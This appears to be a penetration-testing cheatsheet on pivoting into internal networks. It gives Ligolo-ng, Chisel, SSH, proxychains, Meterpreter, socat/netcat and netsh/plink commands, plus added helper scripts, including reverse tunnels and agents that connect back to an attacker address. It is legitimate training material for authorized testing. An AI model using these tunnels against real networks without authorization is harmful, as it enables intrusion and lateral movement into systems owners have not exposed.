network-pentest

Pivoting & Tunneling

Pivot into internal networks — Ligolo-ng, Chisel, SSH local/remote/dynamic forwards & ProxyJump, proxychains, Metasploit autoroute/socks, socat/netcat relays and native Windows netsh/plink forwarding.

Jun 2026 lazyhackers
Ligolo-ng (5)
./proxy -selfcert -laddr 0.0.0.0:11601
Start the Ligolo-ng proxy on your attack box
ligolo server
./agent -connect 10.10.14.1:11601 -ignore-cert
Run the agent on the pivot (Linux or agent.exe)
ligolo agent
sudo ip route add 10.10.20.0/24 dev ligolo
Route the internal subnet through the ligolo tun interface; the interface must already exist (create it with `ip tuntap add user $USER mode tun ligolo` and bring it up with `ip link set ligolo up`), otherwise `ip route add` fails with "Cannot find device"
ligolo route
ligolo> session -> start
Select the agent session, then `start` to bind it to the ligolo interface and begin relaying packets
ligolo
ligolo> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444
Reverse forward: the agent listens on 0.0.0.0:4444 on the pivot and relays to 127.0.0.1:4444 on your proxy box, so internal hosts can call back to the pivot and reach your handler
ligolo listener
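The attacker-side setup for the Ligolo-ng steps above, as an added example script (not part of the original cheatsheet or of the Ligolo-ng project). It assumes the `proxy` binary sits in the current directory, that you have sudo, and that the tun interface is called `ligolo` on port 11601 as in the cheatsheet; the subnets are whatever you pass on the command line. `cidr_ok` is a hypothetical sanity check so a typo never reaches `ip route`.

```shell
#!/usr/bin/env sh
# Added example (not Ligolo-ng's own code): create the tun, add routes,
# then launch the proxy. Assumes ./proxy exists and sudo is available.
set -eu

TUN_IF="${TUN_IF:-ligolo}"         # interface name `start` binds to by default
LADDR="${LADDR:-0.0.0.0:11601}"    # agent connect-back address

# Hypothetical helper: accept only a dotted quad with a /0-32 prefix.
cidr_ok() {
  local ip mask n o oldifs
  case $1 in */*) ;; *) return 1 ;; esac
  ip=${1%/*}; mask=${1#*/}
  case $mask in ''|*[!0-9]*) return 1 ;; esac
  [ "$mask" -le 32 ] || return 1
  n=0; oldifs=$IFS; IFS=.
  for o in $ip; do
    case $o in ''|*[!0-9]*) IFS=$oldifs; return 1 ;; esac
    [ "$o" -le 255 ] || { IFS=$oldifs; return 1; }
    n=$((n + 1))
  done
  IFS=$oldifs
  [ "$n" -eq 4 ]
}

# Create the tun device the agent's packets are injected into. Skipping this
# is the usual reason `ip route add ... dev ligolo` errors out.
tun_up() {
  if ! ip link show "$TUN_IF" >/dev/null 2>&1; then
    sudo ip tuntap add user "$(id -un)" mode tun "$TUN_IF"
  fi
  sudo ip link set "$TUN_IF" up
}

# One route per internal subnet; `replace` is idempotent where `add` errors
# on a second run.
add_routes() {
  local cidr
  for cidr in "$@"; do
    cidr_ok "$cidr" || { echo "bad CIDR: $cidr" >&2; return 1; }
    sudo ip route replace "$cidr" dev "$TUN_IF"
  done
}

# Tear the interface down (routes through it disappear with it).
tun_down() {
  sudo ip link delete "$TUN_IF" 2>/dev/null || true
}

# Usage: ./ligolo_up.sh 10.10.20.0/24 [10.10.30.0/24 ...]   |   ./ligolo_up.sh down
if [ $# -gt 0 ]; then
  case "$1" in
    down) tun_down ;;
    *) tun_up; add_routes "$@"; exec ./proxy -selfcert -laddr "$LADDR" ;;
  esac
fi
```

Once the proxy console is up, run the agent on the pivot, pick its session and `start`; routes added before `start` are fine as long as the tun already exists. Recent Ligolo-ng releases can also create the interface and routes from the proxy console when the proxy runs with enough privileges, in which case only the launch line is needed.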
Chisel (4)
./chisel server -p 8000 --reverse
Start the Chisel server (reverse mode) on the attacker
chisel server
./chisel client 10.10.14.1:8000 R:socks
Reverse SOCKS proxy from the pivot back to you
chisel socks
./chisel client 10.10.14.1:8000 R:3389:127.0.0.1:3389
Reverse single-port forward (e.g. RDP)
chisel portforward
./chisel client pivot:8000 8080:10.10.20.5:80
Local forward to an internal host: here the server (`chisel server -p 8000`, no --reverse) runs on the pivot and the client on your box, so your 127.0.0.1:8080 reaches 10.10.20.5:80
chisel local
SSH Tunneling (4)
ssh -D 1080 -fN user@pivot
Dynamic SOCKS proxy through SSH
ssh socks
ssh -L 8080:10.10.20.5:80 -fN user@pivot
Local port forward to an internal service
ssh local
ssh -R 8080:127.0.0.1:80 -fN user@10.10.14.1
Reverse forward, run from the pivot: expose the pivot's local :80 on your 127.0.0.1:8080
ssh remote
ssh -J user@pivot user@10.10.20.5
ProxyJump straight to an internal host through the pivot (chain hops with commas: -J a,b)
ssh proxyjump
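The same forwards as a persistent `~/.ssh/config`, as an added example that is not part of the original cheatsheet: `ssh pivot` then opens the SOCKS every time and `ssh internal` jumps through it without retyping the flags. The aliases `pivot` and `internal`, the IPs and the user are arguments you choose; the ControlMaster settings are an assumption so later `scp`/`-L` sessions reuse the tunnel instead of re-authenticating.

```shell
#!/usr/bin/env sh
# Added example: write Host stanzas equivalent to `ssh -D 1080 user@pivot`
# and `ssh -J user@pivot user@internal`. Not from the cheatsheet.
set -eu

# write_ssh_hosts CONF PIVOT_IP INTERNAL_IP USER
write_ssh_hosts() {
  conf=$1
  cat >>"$conf" <<EOF
Host pivot
    HostName $2
    User $4
    # Same as ssh -D 1080: a SOCKS5 listener on 127.0.0.1:1080 per connection
    DynamicForward 127.0.0.1:1080
    # Multiplex: later ssh/scp/-L sessions to the pivot ride this connection
    ControlMaster auto
    ControlPath ~/.ssh/cm-%r@%h:%p
    ControlPersist 10m

Host internal
    HostName $3
    User $4
    # Same as ssh -J pivot; add more hops comma-separated (ProxyJump a,b)
    ProxyJump pivot
EOF
}

# Usage: write_ssh_hosts ~/.ssh/config <pivot-ip> 10.10.20.5 user
#        ssh -fN pivot      # SOCKS on 127.0.0.1:1080 for proxychains
#        ssh internal       # lands on the internal host via the pivot
```

`ssh -G internal` prints the options ssh actually resolved for the alias, which is the quickest way to confirm the ProxyJump chain before a long engagement.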
proxychains (use the SOCKS) (4)
echo 'socks5 127.0.0.1 1080' >> /etc/proxychains4.conf
Point proxychains at your SOCKS tunnel (appends under [ProxyList], the last section); comment out the default `socks4 127.0.0.1 9050` Tor entry, or strict_chain fails on that dead first hop before it ever reaches yours
proxychains config
proxychains -q nmap -sT -Pn -n 10.10.20.5
TCP-connect scan through the proxy: raw SYN, ICMP and UDP do not traverse SOCKS, so -sT, -Pn (no ping) and -n (no DNS leaks) are all required
proxychains nmap
proxychains -q nxc smb 10.10.20.0/24 -u user -p pass
Run AD tooling across the internal subnet
proxychains ad
proxychains -q xfreerdp /v:10.10.20.5 /u:user
RDP through the tunnel
proxychains rdp
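A repeatable way to apply the proxychains configuration step above, as an added example that is not from the original cheatsheet: rewrite the `[ProxyList]` section so the only active proxy is the SOCKS you actually opened. It assumes the config path, proxy host and port are passed in, and that the file is the stock one with `strict_chain` and a Tor `socks4 127.0.0.1 9050` entry that would otherwise sit ahead of yours in the chain.

```shell
#!/usr/bin/env sh
# Added example: replace every proxy entry under [ProxyList] with one line.
# Options outside that section (strict_chain, proxy_dns, ...) are untouched.
set -eu

# set_socks CONF HOST PORT [socks4|socks5]
set_socks() {
  conf=$1 host=$2 port=$3 type=${4:-socks5}
  tmp=$(mktemp)
  awk -v entry="$type $host $port" '
    /^\[ProxyList\]/ { print; print entry; inlist=1; next }
    inlist && /^(socks4|socks5|http)[ \t]/ { next }   # drop stale hops
    { print }
  ' "$conf" >"$tmp"
  # A file with no [ProxyList] section at all gets one appended.
  grep -q '^\[ProxyList\]' "$tmp" \
    || printf '[ProxyList]\n%s %s %s\n' "$type" "$host" "$port" >>"$tmp"
  mv "$tmp" "$conf"
}

# active_proxies CONF -> the proxy lines proxychains will actually chain
active_proxies() {
  awk '/^\[ProxyList\]/ { inlist=1; next }
       inlist && /^(socks4|socks5|http)[ \t]/' "$1"
}

# Usage: sudo sh -c '. ./pc.sh; set_socks /etc/proxychains4.conf 127.0.0.1 1080'
#        active_proxies /etc/proxychains4.conf   # expect exactly one line
```

Running `active_proxies` before a scan is the check worth making a habit of: with strict_chain, one leftover entry for a tunnel that is no longer up makes every proxied connection fail, and `-q` hides the reason.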
Metasploit / Meterpreter (3)
run autoroute -s 10.10.20.0/24
Add a Meterpreter route to the internal subnet
metasploit autoroute
portfwd add -l 3389 -p 3389 -r 10.10.20.5
Forward an internal port to your localhost
metasploit portfwd
use auxiliary/server/socks_proxy; run
Expose the Meterpreter routes as a SOCKS proxy for proxychains (listens on 0.0.0.0:1080 by default; set SRVHOST 127.0.0.1 to keep it local and VERSION 5 if your client needs SOCKS5)
metasploit socks
socat / netcat Relays (2)
socat TCP-LISTEN:8080,fork TCP:10.10.20.5:80
Simple TCP relay through a Linux pivot: everything hitting pivot:8080 is forwarded to 10.10.20.5:80; `fork` serves more than one connection
socat relay
mkfifo /tmp/f; nc -lvp 8080 < /tmp/f | nc 10.10.20.5 80 > /tmp/f
Netcat relay without -e: the fifo carries the return path; expect `-l -p` syntax on traditional nc
netcat relay
Windows-Side Forwarding (3)
netsh interface portproxy add v4tov4 listenport=3389 connectaddress=10.10.20.5 connectport=3389
Native Windows port forward, nothing to upload; needs an administrative shell, and the listen port must be allowed through the Windows firewall or nothing reaches it
windows netsh
plink.exe -R 8080:127.0.0.1:80 user@10.10.14.1 -pw pass
SSH reverse tunnel from Windows (plink): exposes the pivot's local :80 on your :8080; answer the host-key prompt (e.g. `echo y | plink ...`) or it blocks in a non-interactive shell
windows plink
chisel.exe client 10.10.14.1:8000 R:socks
Run the Chisel client on Windows
windows chisel